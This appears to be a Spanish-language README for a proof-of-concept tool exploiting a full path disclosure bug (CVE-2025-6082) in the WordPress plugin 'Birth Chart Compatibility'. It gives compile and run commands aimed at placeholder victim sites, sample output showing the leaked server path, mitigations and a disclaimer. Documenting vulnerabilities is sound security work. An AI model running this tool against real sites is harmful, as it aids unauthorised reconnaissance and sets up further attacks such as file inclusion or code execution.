
Prueba de concepto que explota la vulnerabilidad de divulgación de ruta completa en el plugin de WordPress “Birth Chart Compatibility” (<=v2.0)
Autor: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Vulnerabilidad: Divulgación de Ruta Completa (CWE-200)
Este PoC explota un fallo de Divulgación de Ruta Completa en el plugin de WordPress Birth Chart Compatibility (versiones ≤ 2.0). El PoC envía una solicitud HTTP GET al endpoint index.php del plugin, captura cualquier advertencia o error fatal de PHP, y extrae la ruta del sistema de archivos del servidor (p. ej. /var/www/html/wp-content/plugins/... o C:\xampp\htdocs\...).
Revelar la ruta completa ayuda a un atacante a encadenar ataques adicionales de Inclusión de Archivos Locales (LFI), Ejecución Remota de Código (RCE) u otros ataques de reconocimiento.
gcc o compilador C compatiblelibcurlargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [options]
Opciones:
-u, --url (Obligatorio) URL base del sitio WordPress objetivo
-c, --cookies Usar cookies del ARCHIVO (opcional)
-v, --verbose Habilitar salida detallada de curl
-f, --loop Repetir la solicitud N veces (p. ej. -f 10)
-h, --help Mostrar este mensaje de ayuda
Ejemplo:
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5
Salida de ejemplo:
[+] Solicitud enviada correctamente
[+] URL de entrada : https://victim.com
[+] URL completa: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] Código HTTP : 200
====================================[Respuesta]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] Longitud de respuesta : 256
[+] Palabra clave encontrada: Warning:
[+] Contexto: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
Actualice el plugin “Birth Chart Compatibility” a una versión parcheada (> 2.0) tan pronto como esté disponible.
Deshabilite o elimine el plugin si no lo utiliza.
Deniegue el acceso directo a los archivos PHP del plugin (index.php) a través de la configuración de su servidor web (p. ej. mediante reglas .htaccess o Nginx).
Descargo de responsabilidad Este código se proporciona únicamente con fines educativos y de prueba. El uso no autorizado contra sistemas que no sean de su propiedad o para los cuales no tenga permiso explícito para probar puede ser ilegal.